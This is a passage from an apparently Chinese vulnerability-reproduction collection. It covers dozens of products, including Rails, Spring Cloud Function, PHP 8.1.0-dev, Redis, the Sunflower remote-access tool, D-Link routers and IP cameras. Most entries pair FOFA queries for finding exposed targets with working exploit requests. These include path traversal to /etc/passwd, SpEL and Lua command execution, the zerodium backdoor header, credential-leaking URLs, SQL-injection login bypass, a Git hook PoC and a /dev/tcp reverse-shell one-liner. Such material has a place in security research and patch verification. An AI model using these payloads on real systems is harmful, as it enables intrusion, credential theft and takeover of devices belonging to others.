应用程序框架,是一个相对较新的 Web 应用程序框架,构建在 Ruby 语言之上。这个漏洞主要是由于Ruby on Rails使用了指定参数的render file来渲染应用之外的视图,我们可以通过修改访问某控制器的请求包,通过“…/…/…/…/”来达到路径穿越的目的,然后再通过“{{”来进行模板查询路径的闭合,使得所要访问的文件被当做外部模板来解析。 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | Rail <= 5.2.2.1 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | title="Ruby On Rails" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 主页面 22 | 23 | ![image-20220628111456281](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202206281119622.png) 24 | 25 | 验证请求包 26 | 27 | ``` 28 | GET /robots HTTP/1.1 29 | Host: 127.0.0.1:3000 30 | Accept-Encoding: gzip, deflate 31 | Accept: ../../../../../../../../etc/passwd{{ 32 | Accept-Language: en 33 | User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) 34 | Connection: close 35 | ``` 36 | 37 | ![image-20220628111940387](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202206281119526.png) -------------------------------------------------------------------------------- /开发框架漏洞/Rails sprockets 任意文件读取漏洞 CVE-2018-3760.md: -------------------------------------------------------------------------------- 1 | # Rails sprockets 任意文件读取漏洞 CVE-2018-3760 2 | 3 | ## 漏洞描述 4 | 5 | Ruby On Rails在开发环境下使用Sprockets作为静态文件服务器,Ruby On Rails是著名Ruby Web开发框架,Sprockets是编译及分发静态资源文件的Ruby库。 6 | 7 | Sprockets 3.7.1及之前版本中,存在一处因为二次解码导致的路径穿越漏洞,攻击者可以利用%252e%252e/来跨越到根目录,读取或执行目标服务器上任意文件。 8 | 9 | ## 漏洞影响 10 | 11 | ``` 12 | Sprockets < 3.7.1 13 | ``` 14 | 15 | ## FOFA 16 | 17 | ``` 18 | title="Ruby On Rails" 19 | ``` 20 | 21 | ## 漏洞复现 22 | 23 | 主页面 24 | 25 | ![image-20220628111456281](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202206281114422.png) 26 | 27 | 先获取绝对路径 28 | 29 | ``` 30 | /assets/file:%2f%2f/etc/passwd 31 | ``` 32 | 33 | ![image-20220628111516877](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202206281115997.png) 34 | 35 | 再利用POC读取文件 36 | 37 | ``` 38 | /assets/file:%2f%2f/usr/src/blog/app/assets/images/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd 39 | ``` 40 | 41 | ![image-20220628111532098](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202206281115231.png) -------------------------------------------------------------------------------- /开发框架漏洞/Spring Cloud Function SPEL 远程命令执行漏洞.md: -------------------------------------------------------------------------------- 1 | # Spring Cloud Function SPEL 远程命令执行漏洞 2 | 3 | ## 漏洞描述 4 | 5 | Spring Cloud Function 是基于Spring Boot 的函数计算框架,它抽象出所有传输细节和基础架构,允许开发人员保留所有熟悉的工具和流程,并专注于业务逻辑。 由于Spring Cloud Function中RoutingFunction类的apply方法将请求头中的“spring.cloud.function.routing-expression”参数作为Spel表达式进行处理,造成了Spel表达式注入漏洞,未经授权的远程攻击者可利用该漏洞执行任意代码。 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | Spring Cloud Function 11 | ``` 12 | 13 | ## 环境搭建 14 | 15 | - https://github.com/spring-cloud/spring-cloud-function/tree/main/spring-cloud-function-samples/function-sample-pojo 16 | 17 | ## 漏洞复现 18 | 19 | 搭建后访问 20 | 21 | ![image-20220519160206177](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191602220.png) 22 | 23 | 发送POC 24 | 25 | ``` 26 | POST /functionRouter HTTP/1.1 27 | Host: 192.168.1.27:9000 28 | spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("ping -c 1 dxytoy.dnslog.cn") 29 | Content-Length: 1 30 | ``` 31 | 32 | 接收到请求 33 | 34 | ![image-20220519160240168](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191602216.png) -------------------------------------------------------------------------------- /开发语言漏洞/GO TLS握手 崩溃漏洞 CVE-2021-34558.md: -------------------------------------------------------------------------------- 1 | # GO TLS握手 崩溃漏洞 CVE-2021-34558 2 | 3 | ## 漏洞描述 4 | 5 | There is a minor modification to ./vendor/github.com/refraction-networking/utls/handshake_server.go to enable the malicious handshake to be sent with a mismatching certificate/cipher. 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | Go Version < (1.16.6+) 11 | ``` 12 | 13 | ## 漏洞复现 14 | 15 | image-20220520131711402 16 | 17 | 将会生成 https 服务,此时当版本较低时就会产生崩溃,例如部分扫描器对目标进行扫描时 18 | 19 | ![image-20220520131729852](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201317938.png) -------------------------------------------------------------------------------- /开发语言漏洞/PHP zerodium后门漏洞.md: -------------------------------------------------------------------------------- 1 | # PHP zerodium后门漏洞 2 | 3 | ## 漏洞描述 4 | 5 | PHP开发工程师Jake Birchall在对其中一个恶意COMMIT的分析过程中发现,在代码中注入的后门是来自一个PHP代码被劫持的网站上,并且采用了远程代码执行的操作,并且攻击者盗用了PHP开发人员的名义来提交此COMMIT。 6 | 7 | 目前为止PHP官方并未就该事件进行更多披露,表示此次服务器被黑的具体细节仍在调查当中。由于此事件的影响,PHP的官方代码库已经被维护人员迁移至GitHub平台,之后的相关代码更新、修改将会都在GitHub上进行。 8 | 9 | ## 漏洞影响 10 | 11 | ``` 12 | PHP 8.1.0-dev 13 | ``` 14 | 15 | ## FOFA 16 | 17 | ``` 18 | "PHP/8.1.0-dev" 19 | ``` 20 | 21 | ## 漏洞复现 22 | 23 | 后门为添加请求头 24 | 25 | ```plain 26 | User-Agentt: zerodiumsystem('id'); 27 | ``` 28 | 29 | - 是 User-Agentt 不是 User-Agent 30 | 31 | 32 | 33 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091309632.png) 34 | 35 | 反弹shell 36 | 37 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091310034.png) -------------------------------------------------------------------------------- /服务器应用漏洞/ClickHouse API 数据库接口未授权访问漏洞.md: -------------------------------------------------------------------------------- 1 | # ClickHouse API 数据库接口未授权访问漏洞 2 | 3 | ## 漏洞描述 4 | 5 | ClickHouse API 数据库接口存在未授权访问漏洞,攻击者通过漏洞可以执行任意SQL命令获取数据库数据 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | ClickHouse 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | "ClickHouse" && body="ok" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091258079.png) 24 | 25 | 执行SQL语句 26 | 27 | ![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091258245.png) 28 | 29 | ```php 30 | /?query=SELECT%20*%20FROM%20system.query_thread_log%20LIMIT%201%20FORMAT%20Vertical 31 | ``` 32 | 33 | ![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091258274.png) -------------------------------------------------------------------------------- /服务器应用漏洞/Elasticsearch 未授权访问.md: -------------------------------------------------------------------------------- 1 | # Elasticsearch 未授权访问 2 | 3 | ## 漏洞描述 4 | 5 | Elasticsearch是用Java开发的企业级搜索引擎,默认端口9200,存在未授权访问漏洞时,可被非法操作数据 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | Elasticsearch 11 | ``` 12 | 13 | ## 漏洞复现 14 | 15 | 访问目标URL : http://xxx.xxx.xxx.xxx:9200/_node 16 | 17 | ```plain 18 | http://localhost:9200/_cat/indices 19 | http://localhost:9200/_river/_search //查看数据库敏感信息 20 | http://localhost:9200/_nodes //查看节点数据 21 | http://localhost:9200/_plugin/head/ //web管理界面(head插件) 22 | ``` 23 | 24 | -------------------------------------------------------------------------------- /服务器应用漏洞/Franklin Fueling Systems tsaupload.cgi 任意文件读取漏洞 CVE-2021-46417.md: -------------------------------------------------------------------------------- 1 | # Franklin Fueling Systems tsaupload.cgi 任意文件读取漏洞 CVE-2021-46417 2 | 3 | ## 漏洞描述 4 | 5 | Franklin Electric Franklin Fueling Systems是美国Franklin Electric公司的一个加油系统。 6 | 7 | Franklin Fueling Systems tsaupload.cgi 存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器敏感文件。 8 | 9 | ## 漏洞影响 10 | 11 | ``` 12 | Franklin Fueling Systems 13 | ``` 14 | 15 | ## FOFA 16 | 17 | ``` 18 | "Franklin Fueling Systems" 19 | ``` 20 | 21 | ## 漏洞复现 22 | 23 | 主页面 24 | 25 | ![image-20220715105504364](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202207151055481.png) 26 | 27 | 验证POC 28 | 29 | ``` 30 | /cgi-bin/tsaupload.cgi?file_name=../../../../../../etc/passwd&password= 31 | ``` 32 | 33 | ![image-20220715105538276](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202207151055335.png) 34 | 35 | -------------------------------------------------------------------------------- /服务器应用漏洞/Git for Visual Studio远程执行代码漏洞 CVE-2021-21300.md: -------------------------------------------------------------------------------- 1 | # Git for Visual Studio远程执行代码漏洞 CVE-2021-21300 2 | 3 | ## 漏洞描述 4 | 5 | 此漏洞影响具有不区分大小写的文件系统的平台,当某些过滤器被使用时(例如Git LFS)。Git可能会被欺骗运行克隆期间的远程代码。 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | v2.17.6 11 | v2.18.5 12 | v2.19.6 13 | v2.20.5 14 | v2.21.4 15 | v2.22.5 16 | v2.23.4 17 | v2.24.4 18 | v2.25.5 19 | v2.26.3 20 | v2.27.1 21 | v2.28.1 22 | v2.29.3 23 | v2.30.2 24 | ``` 25 | 26 | ## 漏洞复现 27 | 28 | 参考文章: https://www.openwall.com/lists/oss-security/2021/03/09/3 29 | 30 | ## 漏洞POC 31 | 32 | ```bash 33 | #!/bin/sh 34 | 35 | git init delayed-checkout && 36 | ( 37 | cd delayed-checkout && 38 | echo "A/post-checkout filter=lfs diff=lfs merge=lfs" \ 39 | >.gitattributes && 40 | mkdir A && 41 | printf '#!/bin/sh\n\necho PWNED >&2\n' >A/post-checkout && 42 | chmod +x A/post-checkout && 43 | >A/a && 44 | >A/b && 45 | git add -A && 46 | rm -rf A && 47 | ln -s .git/hooks a && 48 | git add a && 49 | git commit -m initial 50 | ) && 51 | git clone delayed-checkout cloned 52 | ``` -------------------------------------------------------------------------------- /服务器应用漏洞/Git-LFS 远程命令执行漏洞 CVE-2020-27955.md: -------------------------------------------------------------------------------- 1 | # Git-LFS 远程命令执行漏洞 CVE-2020-27955 2 | 3 | ## 漏洞描述 4 | 5 | Git LFS 是 Github 开发的一个 Git 的扩展,用于实现 Git 对大文件的支持 6 | 7 | 一些受影响的产品包括Git,GitHub CLI,GitHub Desktop,Visual Studio,GitKraden,SmartGit,Sourcetree等 8 | 9 | 该漏洞影响仅windows平台 10 | 11 | ## 漏洞影响 12 | 13 | ``` 14 | Git-LFS(git-lfs)<= 2.12 15 | ``` 16 | 17 | ## 漏洞复现 18 | 19 | 运行下列的命令,如果版本在影响范围则会弹出计算器 20 | 21 | ```plain 22 | git clone https://github.com/r00t4dm/CVE-2020-27955 23 | ``` 24 | 25 | ![1](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090053405.png) 26 | 27 | ![2](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090053009.png) 28 | 29 | ## 漏洞POC 30 | 31 | ```plain 32 | https://github.com/r00t4dm/CVE-2020-27955 33 | ``` 34 | 35 | -------------------------------------------------------------------------------- /服务器应用漏洞/OpenSSH 命令注入漏洞 CVE-2020-15778.md: -------------------------------------------------------------------------------- 1 | # OpenSSH 命令注入漏洞 CVE-2020-15778 2 | 3 | ## 漏洞描述 4 | 5 | 2020年6月9日,研究人员Chinmay Pandya在Openssh中发现了一个漏洞,于7月18日公开。OpenSSH的8.3p1中的scp允许在scp.c远程功能中注入命令,攻击者可利用该漏洞执行任意命令。目前绝大多数linux系统受影响。深信服安全研究团队依据漏洞重要性和影响力进行评估,作出漏洞通告。 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | OpenSSH <= 8.3p1 11 | ``` 12 | 13 | ## 漏洞复现 14 | 15 | 可用于目标不允许远程登录但SCP开启的情况下远程命令执行 16 | 17 | 攻击机创建 peiqi.txt ,利用 scp上传文件 到 /tmp 目录下 18 | 19 | ![image-20220209125535740](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091255788.png) 20 | 21 | 执行命令 ping dnslog 22 | 23 | 24 | 25 | ![image-20220209125550216](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091255296.png) 26 | 27 | 28 | 29 | 反弹shell 更换命令即可 30 | 31 | ```plain 32 | /bin/bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/9999 0>&1 33 | ``` -------------------------------------------------------------------------------- /服务器应用漏洞/Redis Lua 沙箱绕过 远程命令执行 CVE-2022-0543.md: -------------------------------------------------------------------------------- 1 | # Redis Lua 沙箱绕过 远程命令执行 CVE-2022-0543 2 | 3 | ## 漏洞描述 4 | 5 | Redis是著名的开源Key-Value数据库,其具备在沙箱中执行Lua脚本的能力。 6 | 7 | Debian以及Ubuntu发行版的源在打包Redis时,在Lua沙箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸沙箱执行任意命令。 8 | 9 | ## 漏洞影响 10 | 11 | ``` 12 | 只限于Debian和Debian派生的Linux发行版(如Ubuntu)上的Redis服务 13 | ``` 14 | 15 | ## 漏洞复现 16 | 17 | 远程连接Redis, 执行POC 18 | 19 | ``` 20 | eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("whoami", "r"); local res = f:read("*a"); f:close(); return res' 0 21 | ``` 22 | 23 | ![image-20220524131958982](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241320211.png) -------------------------------------------------------------------------------- /服务器应用漏洞/向日葵 check 远程命令执行漏洞 CNVD-2022-10270.md: -------------------------------------------------------------------------------- 1 | # 向日葵 check 远程命令执行漏洞 CNVD-2022-10270 2 | 3 | ## 漏洞描述 4 | 5 | 向日葵通过发送特定的请求获取CID后,可调用 check接口实现远程命令执行,导致服务器权限被获取 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 11.0.0.33162 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | body="Verification failure" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 向日葵在开启后会默认在 40000-65535 之间开启某端口 22 | 23 | ![image-20220524135408561](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241354598.png) 24 | 25 | 发送请求获取CID 26 | 27 | ``` 28 | /cgi-bin/rpc?action=verify-haras 29 | ``` 30 | 31 | ![image-20220524135428094](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241354132.png) 32 | 33 | 使用获取到的 verify_string 作为 cookie的 CID字段,进行命令执行 34 | 35 | ``` 36 | /check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+ipconfig 37 | ``` 38 | 39 | ![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241354108.png) -------------------------------------------------------------------------------- /网络设备漏洞/ACTI 视频监控 images 任意文件读取漏洞.md: -------------------------------------------------------------------------------- 1 | # ACTI 视频监控 images 任意文件读取漏洞 2 | 3 | ## 漏洞描述 4 | 5 | ACTI 视频监控 存在任意文件读取漏洞 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | ACTI摄像头 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="ACTi-视频监控" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面如下 22 | 23 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202140926386.png) 24 | 25 | 使用Burp抓包 26 | 27 | ```plain 28 | /images/../../../../../../../../etc/passwd 29 | ``` 30 | 31 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202140926873.png) 32 | -------------------------------------------------------------------------------- /网络设备漏洞/Amcrest IP Camera Web Sha1Account1 账号密码泄漏漏洞 CVE-2017-8229.md: -------------------------------------------------------------------------------- 1 | # Amcrest IP Camera Web Sha1Account1 账号密码泄漏漏洞 CVE-2017-8229 2 | 3 | ## 漏洞描述 4 | 5 | Amcrest IP Camera Web是Amcrest公司的一款无线IP摄像头,设备允许未经身份验证的攻击者下载管理凭据。 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | Amcrest Technologies. Amcrest IP Camera Web all 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | "Amcrest" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![image-20220519161504045](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191616449.png) 24 | 25 | POC 26 | 27 | ``` 28 | /current_config/Sha1Account1 29 | ``` 30 | 31 | ![image-20220519161546887](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191616340.png) -------------------------------------------------------------------------------- /网络设备漏洞/Crestron aj.html 账号密码泄漏漏洞 CVE-2022-23178.md: -------------------------------------------------------------------------------- 1 | # Crestron aj.html 账号密码泄漏漏洞 CVE-2022-23178 2 | 3 | ## 漏洞描述 4 | 5 | Crestron HD等系列设备 aj.html页面调用特定的参数可以获取账号密码等敏感信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | Crestron HD等系列设备 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="Crestron-HD-RX-201-C-E" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | POC 22 | 23 | ``` 24 | /aj.html?a=devi 25 | ``` 26 | 27 | ![image-20220519161948146](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191619189.png) -------------------------------------------------------------------------------- /网络设备漏洞/D-LINK DAP-2020 webproc 任意文件读取漏洞 CVE-2021-27250.md: -------------------------------------------------------------------------------- 1 | # D-LINK DAP-2020 webproc 任意文件读取漏洞 CVE-2021-27250 2 | 3 | ## 漏洞描述 4 | 5 | 近日D-Link发布公告[1]称旗下产品DAP-2020存在任意文件读取漏洞,CVE编号为CVE-2021-27250,目前已在硬件版本:A1,固件版本:1.01 上测试了PoC,由于漏洞影响核心组件,因此其他版本也可能受到此漏洞的影响 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | D-LINK DAP-2020 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | body="DAP-1360" && body="6.05" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![image-20220715110127290](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202207151101366.png) 24 | 25 | 验证POC 26 | 27 | ``` 28 | POST /cgi-bin/webproc 29 | 30 | getpage=html%2Findex.html&errorpage=/etc/passwd&var%3Amenu=setup&var%3Apage=wizard&var%3Alogin=true&obj-action=auth&%3Ausername=admin&%3Apassword=123&%3Aaction=login&%3Asessionid=3c1f7123 31 | ``` 32 | 33 | ![image-20220715110059377](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202207151100465.png) -------------------------------------------------------------------------------- /网络设备漏洞/D-Link AC管理系统 默认账号密码.md: -------------------------------------------------------------------------------- 1 | # D-Link AC管理系统 默认账号密码 2 | 3 | ## 漏洞描述 4 | 5 | D-Link AC管理系统存在默认账号密码,可被获取敏感信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | D-Link AC管理系统 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | "AC集中管理平台" && body="D-Link路由器管理页" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 默认口令为 admin:admin 22 | 23 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162228466.png) 24 | 25 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162228570.png) 26 | 27 | 28 | 29 | -------------------------------------------------------------------------------- /网络设备漏洞/D-Link DCS系列监控 账号密码信息泄露漏洞 CVE-2020-25078.md: -------------------------------------------------------------------------------- 1 | # D-Link DCS系列监控 账号密码信息泄露漏洞 CVE-2020-25078 2 | 3 | ## 漏洞描述 4 | 5 | D-Link DCS系列监控 通过访问特定的URL得到账号密码信息,攻击者通过漏洞进入后台可以获取视频监控页面 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | DCS-2530L 11 | DCS-2670L 12 | DCS-4603 13 | DCS-4622 14 | DCS-4701E 15 | DCS-4703E 16 | DCS-4705E 17 | DCS-4802E 18 | DCS-P703 19 | ``` 20 | 21 | ## FOFA 22 | 23 | ``` 24 | app="D_Link-DCS-2530L" 25 | ``` 26 | 27 | ## 漏洞复现 28 | 29 | 访问登录页面如下 30 | 31 | 32 | 33 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162226738.png) 34 | 35 | 出现漏洞的 Url 为, 其中泄露了账号密码 36 | 37 | ```plain 38 | http://xxx.xxx.xxx.xxx/config/getuser?index=0 39 | ``` 40 | 41 | 42 | 43 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162227778.png) 44 | 45 | 使用泄露的账号密码登陆系统 46 | 47 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162227388.png) 48 | -------------------------------------------------------------------------------- /网络设备漏洞/D-Link DSL-28881A FTP配置错误 CVE-2020-24578.md: -------------------------------------------------------------------------------- 1 | # D-Link DSL-28881A FTP配置错误 CVE-2020-24578 2 | 3 | ## 漏洞描述 4 | 5 | D-Link DSL-2888A路由器具有文件共享功能,该功能允许用户通过将外部驱动器插入路由器来与其他网络用户共享文件。然后通过FTP(文件传输协议)共享。但是,FTP服务允许网络用户转义共享文件夹以访问路由器文件系统并下载位于根文件夹中的其他文件。 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | D-Link DSL-2888A 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | body="DSL-2888A" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 前提为使用 **D-Link DSL-28881A 信息泄露 CVE-2020-24577** 获取FTP凭证 22 | 23 | 以下提供了下载“ passwd”的示例: 24 | 在FTP客户端上使用以下命令以有效的凭据(从Finding-2获得)连接到FTP服务。 25 | 使用以下命令导航到根文件夹。 26 | 27 | ```plain 28 | ftp xxx.xxx.xxx.xxx 29 | ftp> cd etc 30 | ftp> get passwd 31 | ``` 32 | 33 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162225017.png) -------------------------------------------------------------------------------- /网络设备漏洞/D-Link DSL-28881A 信息泄露 CVE-2020-24577.md: -------------------------------------------------------------------------------- 1 | # D-Link DSL-28881A 信息泄露 CVE-2020-24577 2 | 3 | ## 漏洞描述 4 | 5 | 通过物理连接或无线访问建立与网络的连接后,恶意用户可以通过直接浏览以下URL来获取纯文本格式的Internet提供商连接用户名和密码,以及无线路由器的纯文本格式的用户名和密码 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | D-Link DSL-2888A 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | body="DSL-2888A" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面输入任意密码建立连接 22 | 23 | 24 | 25 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162223056.png) 26 | 27 | 跳转到 http://xxx.xxx.xxx.xxx/page/login/login.html?error=fail 显示密码错误 28 | 29 | 访问下列两个连接 30 | 31 | http://xxx.xxx.xxx.xxx:8008/tmp/cfg/lib_cfg_cfgcmd 32 | http://xxx.xxx.xxx.xxx:8008/tmp/.nvram 33 | 34 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162223303.png) 35 | 36 | 37 | 38 | - 连接Wifl或物理连接Wifi才能访问 -------------------------------------------------------------------------------- /网络设备漏洞/D-Link DSL-28881A 未授权访问 CVE-2020-24579.md: -------------------------------------------------------------------------------- 1 | # D-Link DSL-28881A 未授权访问 CVE-2020-24579 2 | 3 | ## 漏洞描述 4 | 5 | 路由器Web门户的身份验证不足,无法访问任何经过身份验证的管理页面,而无需输入正确的密码。位于同一网络上的恶意用户可以使用无效的凭据直接浏览到任何经过身份验证的管理页面。 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | D-Link DSL-2888A 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | body="DSL-2888A" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面输入任意密码建立连接 22 | 23 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162224050.png) 24 | 25 | 跳转到 http://xxx.xxx.xxx.xxx/page/login/login.html?error=fail 显示密码错误 26 | 27 | 再请求URL http://xxx.xxx.xxx.xxx/WiFi.shtml 未授权访问后台 28 | 29 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162224162.png) -------------------------------------------------------------------------------- /网络设备漏洞/D-Link DSR-250N 万能密码漏洞.md: -------------------------------------------------------------------------------- 1 | # D-Link DSR-250N 万能密码漏洞 2 | 3 | ## 漏洞描述 4 | 5 | D-Link DSR-250N 存在万能密码漏洞,攻击者通过漏洞可以获取后台权限 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | D-Link DSR-250N 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="D_Link-DSR-250N" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面如下 22 | 23 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162222919.png) 24 | 25 | ```plain 26 | user: admin 27 | pass: ' or '1'='1 28 | ``` 29 | 30 | 成功登录后台 31 | 32 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162223338.png) -------------------------------------------------------------------------------- /网络设备漏洞/D-Link Dir-645 getcfg.php 账号密码泄露漏洞 CVE-2019-17506.md: -------------------------------------------------------------------------------- 1 | # D-Link Dir-645 getcfg.php 账号密码泄露漏洞 CVE-2019-17506 2 | 3 | ## 漏洞描述 4 | 5 | D-Link DIR-868L B1-2.03和DIR-817LW A1-1.04路由器上有一些不需要身份验证的Web界面。攻击者可以通过SERVICES的DEVICE.ACCOUNT值以及AUTHORIZED_GROUP = 1%0a来获取getcfg.php的路由器的用户名和密码(以及其他信息)。这可用于远程控制路由器 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | D-Link Dir 系列多个版本 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="D_Link-DIR-868L" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面如下 22 | 23 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162225738.png) 24 | 25 | 发送下请求包 26 | 27 | ```plain 28 | POST /getcfg.php HTTP/1.1 29 | Host: 30 | Content-Type: application/x-www-form-urlencoded 31 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 32 | Content-Length: 61 33 | 34 | SERVICES=DEVICE.ACCOUNT&attack=ture%0D%0AAUTHORIZED_GROUP%3D1 35 | ``` 36 | 37 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162226400.png) 38 | 39 | 获取到路由器账号密码即可登录后台 40 | -------------------------------------------------------------------------------- /网络设备漏洞/D-Link ShareCenter DNS-320 system_mgr.cgi 远程命令执行漏洞.md: -------------------------------------------------------------------------------- 1 | # D-Link ShareCenter DNS-320 system_mgr.cgi 远程命令执行漏洞 2 | 3 | ## 漏洞描述 4 | 5 | D-Link ShareCenter DNS-320 system_mgr.cgi 存在远程命令执行,攻击者通过漏洞可以控制服务器 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | D-Link ShareCenter DNS-320 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="D_Link-DNS-ShareCenter" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面如下 22 | 23 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162224540.png) 24 | 25 | 漏洞POC为 26 | 27 | ```plain 28 | /cgi-bin/system_mgr.cgi?cmd=cgi_get_log_item&total=;ls; 29 | ``` 30 | 31 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162224614.png) -------------------------------------------------------------------------------- /网络设备漏洞/DVR 登录绕过漏洞 CVE-2018-9995.md: -------------------------------------------------------------------------------- 1 | # DVR 登录绕过漏洞 CVE-2018-9995 2 | 3 | ## 漏洞描述 4 | 5 | DVR,全称为Digital Video Recorder(硬盘录像机),即数字视频录像机。最初由阿根廷研究员发现,通过使用“Cookie: uid = admin”的Cookie标头来访问特定DVR的控制面板,DVR将以明文形式响应设备的管理员凭证。 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | Novo 11 | CeNova 12 | QSee 13 | Pulnix 14 | XVR 5 in 1 (title: "XVR Login") 15 | Securus, - Security. Never Compromise !! - 16 | Night OWL 17 | DVR Login 18 | HVR Login 19 | MDVR Login 20 | ``` 21 | 22 | ## 漏洞复现 23 | 24 | 使用curl命令获得账号密码 25 | 26 | ```shell 27 | curl "http://xxx.xxx.xxx.xxx/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin" 28 | ``` 29 | 30 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202110916977.png) 